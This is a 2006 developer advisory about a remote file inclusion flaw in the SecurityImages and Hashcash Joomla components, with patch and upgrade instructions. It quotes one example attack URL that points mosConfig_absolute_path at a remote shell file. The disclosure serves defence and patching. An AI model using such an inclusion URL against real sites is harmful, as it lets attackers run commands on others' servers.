Support
Forums
Contact Me
Download
Demo
Security risk in securityimages
- Details
- Category: SecurityImages
- Published on Tuesday, 01 August 2006 19:49
- Written by Administrator
- Hits: 14906
 | The webmaster of janwiersma.com sent me an email today at 6:12AM , his server was hacked because of a bug in securityimages. This bug allows a remote atacker to execute commands via remote forceful include and execute function on your server and affect ALL version of securityimages <= 3.0.5 Here are all files which put your server at risk: client.php, configinsert.php, lang.php, server.php Example of attack: http://web/components/com_securityimages/ configinsert.php?mosConfig_absolute_path=http://shell.txt from http://securityreason.com/exploitalert/892 Secunia has also a report on it: http://secunia.com/product/11186/ |
| In fact I forget to use that line in these files: defined('_VALID_MOS') or die('Direct Access to this location is not allowed.'); This avoid any requests to access directly this file. - upgrade to 3.0.6 (download at Joomla Forge or in my download sections) OR - patch the faulty files by hand (add defined('_VALID_MOS') or die('Direct Access to this location is not allowed.'); at the beginning of each file) Please also contact all Your friends which are using securityimages! And for my other components? Hashcash 1.2.X is also affected: http://secunia.com/product/11046/ and my patch is avalaible! - upgrade to 1.2.2 (download at Joomla Forge or in my download sections) OR - patch the faulty files by hand (add defined('_VALID_MOS') or die('Direct Access to this location is not allowed.'); at the beginning of each file) JoomlaCloud is NOT affected | |
YOU ARE ALL URGE TO UPGRADE ASAP!
You might also like:
724 days ago
Nasty Bug in SecurityImages 5.1.2
Thanks to Margus Pala, a security Flaw has been reported and corrected in SecurityImages version 5
1382 days ago
HOW to make your own patches for securityimages
Just in case I take too much time to deliver a ready to use download, duration 5 minutes, but you ne
1392 days ago
Joomla_1.5.13-Stable-Full_PackageForSecurityImages5.1.x_v01.
Only for SecurityImages 5.1.x and Joomla! 1.5.13 Allow login views, login modules, register, lost
1414 days ago
Joomla_1.5.12-Stable-Full_PackageForSecurityImages5.1.x_v01.
Only for SecurityImages 5.1.x and Joomla! 1.5.12 Allow login views, login modules, register, lost
1414 days ago
SecurityImages 5.1.2 available
This version should improve installations on some host, where the plugin securityimages.php did no
1445 days ago
Joomla_1.5.11-Stable-Full_PackageForSecurityImages5.1.1.zip
The Joomla! community is pleased to announce the immediate availability of Joomla! 1.5.11 Since
Donations
Thank You for supporting my work
My Other Sites
Services
Joomla!
WEB 2.0
Fun
Skype
Need desperately help?
But dont abuse of it!
But dont abuse of it!